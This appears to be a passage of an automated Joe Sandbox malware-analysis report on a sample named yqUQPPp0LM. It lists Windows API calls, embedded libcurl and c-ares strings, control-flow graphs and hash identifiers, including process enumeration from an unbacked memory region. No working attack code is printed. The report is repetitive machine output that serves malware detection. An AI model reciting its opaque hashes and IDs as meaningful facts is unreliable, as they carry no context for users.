                                        • Opcode Fuzzy Hash: 4820e49823f4740f8dcd5916c7e3a23d34027effddfdda1743ecaa0cb06ba597
                                        • Instruction Fuzzy Hash: 4F72C1B1608381AFE7249B25CC81B6BB7E8FF86B04F144828F995D7291E771E944CB53
                                        APIs
                                        • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0086A831
                                        Strings
                                        • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0086A6CE
                                        • Local Interface %s is ip %s using address family %i, xrefs: 0086AE60
                                        • Bind to local port %d failed, trying next, xrefs: 0086AFE5
                                        • bind failed with errno %d: %s, xrefs: 0086B080
                                        • cf-socket.c, xrefs: 0086A5CD, 0086A735
                                        • @, xrefs: 0086A8F4
                                        • cf_socket_open() -> %d, fd=%d, xrefs: 0086A796
                                        • Could not set TCP_NODELAY: %s, xrefs: 0086A871
                                        • @, xrefs: 0086AC42
                                        • Name '%s' family %i resolved to '%s' family %i, xrefs: 0086ADAC
                                        • Trying [%s]:%d..., xrefs: 0086A689
                                        • Trying %s:%d..., xrefs: 0086A7C2, 0086A7DE
                                        • Local port: %hu, xrefs: 0086AF28
                                        • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0086AD0A
                                        • Couldn't bind to '%s' with errno %d: %s, xrefs: 0086AE1F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: setsockopt
                                        • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                        • API String ID: 3981526788-2373386790
                                        • Opcode ID: 4cee21fa6a07268bc22ff1dad2dfa41b9adec201e0903a60615b3e17d231cbc7
                                        • Instruction ID: c622cb4f2bb3e14acb065eb392d4d12ce17a077dac8261a917bc52c96434274c
                                        • Opcode Fuzzy Hash: 4cee21fa6a07268bc22ff1dad2dfa41b9adec201e0903a60615b3e17d231cbc7
                                        • Instruction Fuzzy Hash: 75621371508341ABE724CF24D846BABB7E4FF91318F054929F988E7292E771E845CB93

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 008F9946
                                        • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 008F9974
                                        • RegCloseKey.KERNELBASE(?), ref: 008F998B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                        • API String ID: 3677997916-4129964100
                                        • Opcode ID: 11d2f1a4c5ea581a395bf24488656e2616ae632a61bde298db272399c4e0196b
                                        • Instruction ID: 0392d73a2de75d8ebf9b8888c102ac78b96ca5f8911ced5188362070a13b3857
                                        • Opcode Fuzzy Hash: 11d2f1a4c5ea581a395bf24488656e2616ae632a61bde298db272399c4e0196b
                                        • Instruction Fuzzy Hash: 7832C4B5904245ABEB11AB39EC42B3B76D8FF55318F084434FA89D6263FB21E924C753

                                        APIs
                                        • connect.WS2_32(?,?,00000001), ref: 00868C30
                                        • SleepEx.KERNELBASE(00000000,00000000), ref: 00868CF3
                                        • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00868D0F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Similarity
                                        • API ID: Sleepconnectgetsockopt
                                        • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                        • API String ID: 1669343778-879669977
                                        • Opcode ID: 140c83692da898611c157063478166aabcead09ab9814b60f4b6d1bc60a011fd
                                        • Instruction ID: 33ee55f2c1c510c60a00993905977da1d631703c4f8e42a41cb8f2605eac5cf0
                                        • Opcode Fuzzy Hash: 140c83692da898611c157063478166aabcead09ab9814b60f4b6d1bc60a011fd
                                        • Instruction Fuzzy Hash: 7CB1B07060470AEFDB14CF24D985BA6B7A0FF45328F058628E85DDB2D2DB71E844CB62

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: *
                                        • API String ID: 1332880857-403698594
                                        • Opcode ID: f6415df6b5dbfa91309e206d7e6ef69c1bfcd89b6ab42c02ac6d35b20fa0af80
                                        • Instruction ID: a08afec177c2d1cdf12ff7a3fc3d19388db37b32ea7865fcad078e002ec5cca7
                                        • Opcode Fuzzy Hash: f6415df6b5dbfa91309e206d7e6ef69c1bfcd89b6ab42c02ac6d35b20fa0af80
                                        • Instruction Fuzzy Hash: 2A7192B49043199FDB10DF69C58579EBBF0FF84308F10885DE898A7351E7749A888F92

                                        APIs
                                        • socket.WS2_32(FFFFFFFF,?,00000000), ref: 008FAB9B
                                        • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 008FABE4
                                        • setsockopt.WS2_32(?,00000006,00000001,0000001C,00000004), ref: 008FAD20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Similarity
                                        • API ID: ioctlsocketsetsockoptsocket
                                        • String ID: ;m
                                        • API String ID: 2067140946-2913778575
                                        • Opcode ID: 1b12078fa4c61b09ca0459e4ca6d433faaa098a70c27cb97d3f6dd96b82ec709
                                        • Instruction ID: d9a2e45ccb96cc335a6c7d90ca95b05defbc3c03e64c9236731d804affa5dfeb
                                        • Opcode Fuzzy Hash: 1b12078fa4c61b09ca0459e4ca6d433faaa098a70c27cb97d3f6dd96b82ec709
                                        • Instruction Fuzzy Hash: B8E1DFB060430A9BE724CF24C881B7BB7E5FF85324F144A2CEA98CB291D775D844CB92

                                        APIs
                                        • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0086935D
                                        • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00869389
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Similarity
                                        • API ID: Ioctlsetsockopt
                                        • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                        • API String ID: 1903391676-2691795271
                                        • Opcode ID: 815ad239dba72cfd633446ef395ad465442f4b12211869571ab9af5963c2c764
                                        • Instruction ID: d56ccb879c10d9eb8726a3229cd2441fb2aa83a83242bcbc8f8b25957769b07f
                                        • Opcode Fuzzy Hash: 815ad239dba72cfd633446ef395ad465442f4b12211869571ab9af5963c2c764
                                        • Instruction Fuzzy Hash: 4351AD70604305ABD711DF28C981BAAB7A9FF88314F158529FD88DB3C2EB71E951CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1651 8376a0-8376be 1652 8376c0-8376c7 1651->1652 1653 8376e6-8376f2 send 1651->1653 1652->1653 1654 8376c9-8376d1 1652->1654 1655 8376f4-837709 call 8372a0 1653->1655 1656 83775e-837762 1653->1656 1657 8376d3-8376e4 1654->1657 1658 83770b-837759 call 8372a0 call 83cb20 call bb8c50 1654->1658 1655->1656 1657->1655 1658->1656
                                        APIs
                                        • send.WS2_32(multi.c,?,?,?,00833D4E,00000000,?,?,008407BF), ref: 008376EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: send
                                        • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                        • API String ID: 2809346765-3388739168
                                        • Opcode ID: 7639b2fb15de01ae822e4c95ebf5ffc4b2ffac945baa6fc709a8e35106b8925b
                                        • Instruction ID: 06d739dcc5304a8877903cecb7478222cca50affcedeb0c0cb1c90f413030483
                                        • Opcode Fuzzy Hash: 7639b2fb15de01ae822e4c95ebf5ffc4b2ffac945baa6fc709a8e35106b8925b
                                        • Instruction Fuzzy Hash: 9C110AF160D3487BD53097159C57D6B7B9CEBC6B68F051518F808A3242E661DC41C6F3

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1770 837770-83778e 1771 837790-837797 1770->1771 1772 8377b6-8377c2 recv 1770->1772 1771->1772 1773 837799-8377a1 1771->1773 1774 8377c4-8377d9 call 8372a0 1772->1774 1775 83782e-837832 1772->1775 1776 8377a3-8377b4 1773->1776 1777 8377db-837829 call 8372a0 call 83cb20 call bb8c50 1773->1777 1774->1775 1776->1774 1777->1775
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: recv
                                        • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                        • API String ID: 1507349165-640788491
                                        • Opcode ID: a3a7659638602043962637c3eef106ca380a683ec7a9b00db8d96edfd4f294a0
                                        • Instruction ID: c2c06809e36a8cdf9eab42f40628760360b5a3247ee34cf01bd90bd8273cc067
                                        • Opcode Fuzzy Hash: a3a7659638602043962637c3eef106ca380a683ec7a9b00db8d96edfd4f294a0
                                        • Instruction Fuzzy Hash: 1F110AF56093087BD13097159C4AE777B5CEFCAB68F451528F908A3382E661DC40C5F2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1789 8375e0-8375ed 1790 837607-837629 socket 1789->1790 1791 8375ef-8375f6 1789->1791 1792 83762b-83763c call 8372a0 1790->1792 1793 83763f-837642 1790->1793 1791->1790 1794 8375f8-8375ff 1791->1794 1792->1793 1795 837643-837699 call 8372a0 call 83cb20 call bb8c50 1794->1795 1796 837601-837602 1794->1796 1796->1790
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2470058848.0000000000831000.00000040.00000001.01000000.00000003.sdmp, Offset: 00830000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_830000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: socket
                                        • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                        • API String ID: 98920635-842387772
                                        • Opcode ID: cccd5a542fa6854c581e23cd1b2e5a61f58cd3fbf3418068171a329b0900f61c
                                        • Instruction ID: a1aca6b8629246fa442d609e1017cb4b67d09dbce746d353a7dd51478c3a2d80
                                        • Opcode Fuzzy Hash: cccd5a542fa6854c581e23cd1b2e5a61f58cd3fbf3418068171a329b0900f61c
                                        • Instruction Fuzzy Hash: F01148B2A0571177D6205B6DAC17EDB3B98EFC5724F441524F804E62E2E612CCD5D2F2

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1883 744005f-7440170 call 7440136 call 7440171 1896 74401d0-744037e call 7440245 1883->1896 1897 7440172-7440182 1883->1897 1923 7440385-744042b 1896->1923 1924 7440380 call 744038d 1896->1924 1899 744018c 1897->1899 1900 7440187 call 7440193 1897->1900 1902 744016e-7440170 1899->1902 1903 744018e-74401cd 1899->1903 1900->1899 1902->1896 1908 7440171-7440187 call 7440193 1902->1908 1903->1896 1908->1899 1931 744043e-7440447 Process32FirstW 1923->1931 1924->1923 1932 744045d-74409a1 call 7440585 call 7440654 call 74406a6 call 7440818 call 74409a9 1931->1932
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PR`SY$`
                                        • API String ID: 0-215690257
                                        • Opcode ID: 528919299b2561a3a11d281ecd9546f9e87471e1a5446ea28f7e356093cd9152
                                        • Instruction ID: 2ba39859335e8f72778606c2f9e7ccdf385847e658bb9a106a3bdd264f6e068d
                                        • Opcode Fuzzy Hash: 528919299b2561a3a11d281ecd9546f9e87471e1a5446ea28f7e356093cd9152
                                        • Instruction Fuzzy Hash: 42D128EB15C111BEB20291452F54AFA6B7EF6C7730B3088ABF607C6512E2E44E6B3571

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1995 74400cf-7440170 call 7440136 call 7440171 2004 74401d0-744037e call 7440245 1995->2004 2005 7440172-7440182 1995->2005 2031 7440385-744042b 2004->2031 2032 7440380 call 744038d 2004->2032 2007 744018c 2005->2007 2008 7440187 call 7440193 2005->2008 2010 744016e-7440170 2007->2010 2011 744018e-74401cd 2007->2011 2008->2007 2010->2004 2016 7440171-7440187 call 7440193 2010->2016 2011->2004 2016->2007 2039 744043e-7440447 Process32FirstW 2031->2039 2032->2031 2040 744045d-74409a1 call 7440585 call 7440654 call 74406a6 call 7440818 call 74409a9 2039->2040
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PR`SY$`
                                        • API String ID: 0-215690257
                                        • Opcode ID: 6df39af90d1cb7fd4de492e16c007f6b1d55d839bde499a3e58c29c3fdd16455
                                        • Instruction ID: 8b34feb94ff19f6c73883e7fcc22bb993b66fa9ace0404b56df179afa2d8f6cd
                                        • Opcode Fuzzy Hash: 6df39af90d1cb7fd4de492e16c007f6b1d55d839bde499a3e58c29c3fdd16455
                                        • Instruction Fuzzy Hash: 21D129EB15C111BEB20291452B54AFA6B7EF6C7730F3088ABF607C6512E2E44E6B3571

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2103 7440171-744018c call 7440193 2106 744016e-7440170 2103->2106 2107 744018e-74401cd 2103->2107 2106->2103 2110 74401d0-744037e call 7440245 2106->2110 2107->2110 2128 7440385-744042b 2110->2128 2129 7440380 call 744038d 2110->2129 2136 744043e-7440447 Process32FirstW 2128->2136 2129->2128 2137 744045d-74409a1 call 7440585 call 7440654 call 74406a6 call 7440818 call 74409a9 2136->2137
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: PR`SY$`
                                        • API String ID: 0-215690257
                                        • Opcode ID: 8fc412dc2108c1b38ec2e210252dda436add6e232efbc3136233714e05e6933f
                                        • Instruction ID: 4da017a66f63db60f59bdf1b0914bdbc8c948acc12f2a46da66433c5e0ea9669
                                        • Opcode Fuzzy Hash: 8fc412dc2108c1b38ec2e210252dda436add6e232efbc3136233714e05e6933f
                                        • Instruction Fuzzy Hash: 5CC1F8EB15C121BDB10291852F54AFB6B6EF6C7730B3088ABF607C6512E2E44E6B3571
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: 18f5119b9c73a3ce50e5627d2b21b3cb708efad90de4efca2a76b8507b792af3
                                        • Instruction ID: d2bf78d0cccd102348ccf9a973ad6c0f8cddb204acc61818460de4968101997c
                                        • Opcode Fuzzy Hash: 18f5119b9c73a3ce50e5627d2b21b3cb708efad90de4efca2a76b8507b792af3
                                        • Instruction Fuzzy Hash: 97B1E6FB15C121BEB14291412F54AFA6B6EF6C7730B3088ABF607C6512E2A44E6B3571
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: adcc852bb1cc3fa248327846a4970ab2e7431f5efdf0c5323ba711908eaeede0
                                        • Instruction ID: 9076ca248aa38336c325a82424c5923aaeacfe360f277a69f6c4cdd5a65a5a0c
                                        • Opcode Fuzzy Hash: adcc852bb1cc3fa248327846a4970ab2e7431f5efdf0c5323ba711908eaeede0
                                        • Instruction Fuzzy Hash: FDB1D8FB15C121BEB14295412F54AF66B6EF6C7730F3088ABF607C6512E2A44E6B3471
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: 8549a28e20948c4c7e3148a2499c1f547cf73a766f1ed51af99d0c84a70eb451
                                        • Instruction ID: f2863fd813d7b5ff9fb32b6a1bf23e96aea403b8a84282b3e21afa5802da811e
                                        • Opcode Fuzzy Hash: 8549a28e20948c4c7e3148a2499c1f547cf73a766f1ed51af99d0c84a70eb451
                                        • Instruction Fuzzy Hash: 5CA1D6EB15C121BEB24291452F54AFA6B2EF6C7730F3088ABF607C6512E2944E6B3471
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: e0472c2e674cce34e6cdaa8f41eda414dca4d37fee87b2123d072597c9223efb
                                        • Instruction ID: a8377ba3e36389355432d0d09c6e766ed3a0acd09dcc9b21e2c959cd83fe65ec
                                        • Opcode Fuzzy Hash: e0472c2e674cce34e6cdaa8f41eda414dca4d37fee87b2123d072597c9223efb
                                        • Instruction Fuzzy Hash: FF91F8E716C121BEB24291452F54AFA6B2EF6C7730F308CABF607C6512E2944E6B3571
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: 26186caed4d8bae4610a45c5524a96b2370fda95665aa9f4ad4bebb41f8280d1
                                        • Instruction ID: a856161d10b0c89f8266d3ff08b38ef92686e8c90ca29b3e495255660971f373
                                        • Opcode Fuzzy Hash: 26186caed4d8bae4610a45c5524a96b2370fda95665aa9f4ad4bebb41f8280d1
                                        • Instruction Fuzzy Hash: EE9127EB15C111BEB202D5512F50AFA6B2EF6C7730F308CABF607C6512E2944E6B2571
                                        APIs
                                        • Process32FirstW.KERNEL32(-00007A71,0000858D,0000858D), ref: 07440442
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473140107.0000000007440000.00000040.00001000.00020000.00000000.sdmp, Offset: 07440000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7440000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID: FirstProcess32
                                        • String ID: PR`SY$`
                                        • API String ID: 2623510744-215690257
                                        • Opcode ID: e0c9418615d1082875078255283e1296a45a4f3f99385ab64f99f3b3c57f8d9a
                                        • Instruction ID: 2e535fab0ad9154afa46472d8e7d96a05699693f4d773a433a7fe946098d014a
                                        • Opcode Fuzzy Hash: e0c9418615d1082875078255283e1296a45a4f3f99385ab64f99f3b3c57f8d9a
                                        • Instruction Fuzzy Hash: 989107E715C111BEB20295512F50AFA672EF6C7730F318CABF607C6512E2A44E6B3571
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 67cff1677c292150c0310c7bac843f5022945d2041c07f2662eb85278076f411
                                        • Instruction ID: 74d4ecf6bb8fab6219612fc9da502f166d52eb3d6a924f86a14fcde0305cdf05
                                        • Opcode Fuzzy Hash: 67cff1677c292150c0310c7bac843f5022945d2041c07f2662eb85278076f411
                                        • Instruction Fuzzy Hash: 0981AEEB15C121BD710284952B54BFB676EE5C7730B31883BF807D66A2E2E54E4F11B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: e86cb99fd53f1c5c0fa5cdaa084b5afac3ef70c96584f9f6dbb81e7371014c0b
                                        • Instruction ID: b5f8c6561167b455095094a3676d9c4140abc98b43b3048a6d7157c8e3441f06
                                        • Opcode Fuzzy Hash: e86cb99fd53f1c5c0fa5cdaa084b5afac3ef70c96584f9f6dbb81e7371014c0b
                                        • Instruction Fuzzy Hash: B081AEEB19C121BD710284952B54BFB676EE5C7730B31883BF807D6692E2E54E4F11B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 1ae7d269931cc7fc05b3adf6c38b79a1edd9f9e12fa8b82d93fcce6ebf87ebb0
                                        • Instruction ID: 4406fd4794d19993398b7fa0f09b764233117664c85ef6e4ab8628488177ea0c
                                        • Opcode Fuzzy Hash: 1ae7d269931cc7fc05b3adf6c38b79a1edd9f9e12fa8b82d93fcce6ebf87ebb0
                                        • Instruction Fuzzy Hash: 2A818DEB19C121BD7102C4952B54BFB676EE5C7730B31883BF807D66A2E2A54E4F11B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        • Opcode ID: 9543194332edf52e6415495a4545e42e44f6b5421f2485d007976859148310e6
                                        • Instruction ID: ad334addcdbace44a6fd9de3b5db5315231eec374afa210e12fb14cf88047d85
                                        • Opcode Fuzzy Hash: 9543194332edf52e6415495a4545e42e44f6b5421f2485d007976859148310e6
                                        • Instruction Fuzzy Hash: 93818FEB19C121BD7102C4952B54BFB676EE5C7730B31883BF807D66A2E2A54E4F11B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A:\$A:\
                                        • API String ID: 0-1047444362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2473058926.0000000007400000.00000040.00001000.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7400000_yqUQPPp0LM.jbxd
                                        Similarity
                                        • API ID:
